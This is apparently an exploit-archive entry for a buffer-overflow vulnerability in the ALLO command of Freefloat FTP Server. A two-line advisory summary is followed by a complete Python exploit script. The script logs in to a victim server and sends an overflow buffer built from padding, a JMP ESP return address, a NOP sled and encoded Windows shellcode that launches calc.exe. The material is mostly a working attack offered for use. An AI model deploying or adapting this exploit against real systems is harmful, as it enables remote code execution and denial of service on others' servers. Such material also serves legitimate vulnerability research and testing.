source: https://www.securityfocus.com/bid/49265/info
Freefloat FTP Server is prone to a buffer-overflow vulnerability.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
import socket
import sys
def usage():
print "usage : ./freefloatftp.py <victim_ip> <victim_port>"
print "example: ./freefloatftp.py 192.168.1.100 21"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "\n"
print "#############################################################################"
print "# Freefloat FTP Server ALLO Buffer Overflow Vulnerability Exploit #"
print "#############################################################################"
print "\n"
if len(sys.argv) != 3:
usage()
sys.exit()
ip = sys.argv[1]
port = sys.argv[2]
junk1= "\x41" * 246
ret = "\xED\x1E\x94\x7C" #7C941EED JMP ESP
nop = "\x90"* 200
# windows/exec CMD=calc.exe
shellcode =("\x89\xe3\xdb\xd4\xd9\x73\xf4\x5d\x55\x59\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51"
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32"
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
"\x42\x75\x4a\x49\x4d\x6f\x58\x70\x56\x4f\x54\x70\x4d\x6e"
"\x58\x59\x58\x4b\x54\x69\x5a\x69\x4d\x61\x56\x53\x4b\x69"
"\x52\x54\x45\x74\x4b\x44\x43\x6a\x45\x61\x50\x7a\x45\x42"
"\x4d\x53\x58\x42\x54\x44\x43\x33\x4d\x5a\x45\x71\x58\x52"
"\x50\x4b\x4d\x46\x5a\x76\x4d\x4b\x4c\x74\x43\x56\x45\x77"
"\x49\x6c\x45\x6d\x4c\x43\x56\x76\x54\x6e\x56\x39\x4b\x70"
"\x54\x4b\x4b\x4e\x51\x39\x4d\x54\x4d\x77\x51\x65\x51\x6f"
"\x45\x6c\x54\x73\x49\x6b\x4d\x78\x45\x63\x4c\x34\x58\x36"
"\x4e\x6e\x50\x7a\x47\x75\x54\x37\x56\x6f\x58\x50\x4b\x75"
"\x47\x69\x49\x63\x47\x5a\x54\x5a\x4b\x4a\x5a\x6a\x4b\x55"
"\x50\x6f\x4b\x4b\x54\x4b\x45\x4b\x4d\x4f\x4d\x79\x58\x44"
"\x56\x30\x54\x72\x51\x4e\x51\x70\x47\x54\x4e\x6f\x43\x6f"
"\x4e\x46\x51\x33\x4c\x6f\x56\x47\x5a\x63\x5a\x53\x43\x74"
"\x5a\x32\x49\x5a\x45\x73\x58\x74\x4e\x49\x4e\x65\x4b\x6b"
"\x51\x6e\x49\x65\x50\x35\x49\x4a\x51\x43\x5a\x45\x56\x6a"
"\x4d\x45\x4e\x38\x49\x4e\x49\x69\x56\x44\x54\x49\x54\x6f"
"\x47\x71\x52\x37\x50\x75\x49\x6c\x47\x4c\x4e\x78\x50\x78"
"\x4b\x4c\x52\x59\x47\x6e\x45\x33\x4c\x4b\x52\x51\x51\x4d"
"\x47\x6e\x4e\x6c\x43\x71\x47\x6c\x4f\x34\x56\x79\x43\x64"
"\x4c\x46\x4e\x6f\x4f\x4a\x4d\x6c\x56\x57\x47\x33\x43\x6c"
"\x47\x46\x47\x4b\x47\x58\x45\x7a\x54\x50\x43\x6f\x4e\x4f"
"\x4b\x4f\x54\x6a\x51\x4b\x54\x64\x49\x6e\x4b\x4c\x5a\x4a"
"\x51\x6e\x56\x45\x4e\x39\x4c\x77\x54\x65\x43\x74\x54\x38"
"\x47\x6d\x4c\x4b\x50\x79\x4c\x5a\x58\x79\x50\x74\x4b\x6c"
"\x4e\x30\x5a\x4b\x51\x71\x52\x46\x4d\x6b\x45\x31\x51\x67"
"\x58\x6a\x4b\x71\x5a\x6c\x52\x57\x4b\x44\x4b\x79\x51\x6e"
"\x54\x50\x4f\x35\x43\x72\x56\x71\x50\x67\x5a\x7a\x4b\x30"
"\x50\x56\x4f\x67\x4e\x70\x4b\x39\x49\x6e\x50\x30\x43\x4d"
"\x51\x48\x52\x63\x51\x4d\x51\x6e\x58\x36\x4b\x37\x56\x38"
"\x49\x6d\x54\x73\x52\x57\x4f\x6f\x47\x6d\x45\x66\x51\x62"
"\x4b\x6b\x4c\x59\x4f\x5a\x54\x4e\x54\x34\x52\x6c\x58\x4d"
"\x4d\x6d\x50\x75\x51\x55\x4c\x6e\x45\x70\x58\x66\x54\x45"
"\x47\x6f\x5a\x67\x4c\x4e\x4e\x4c\x51\x4f\x41\x41")
buff = junk1 + ret + nop + shellcode
try:
print("[-] Connecting to " + ip + " on port " + port + "\n")
s.connect((ip,int(port)))
data = s.recv(1024)
print("[-] Sending exploit...")
s.send("USER test\r\n")
s.recv(1024)
s.send("PASS test\r\n")
s.recv(1024)
s.send("ALLO "+buff+"\r\n")
s.close()
print("[-] Exploit successfully sent...")
except:
print("[-] Connection error...")
print("[-] Check if victim is up.")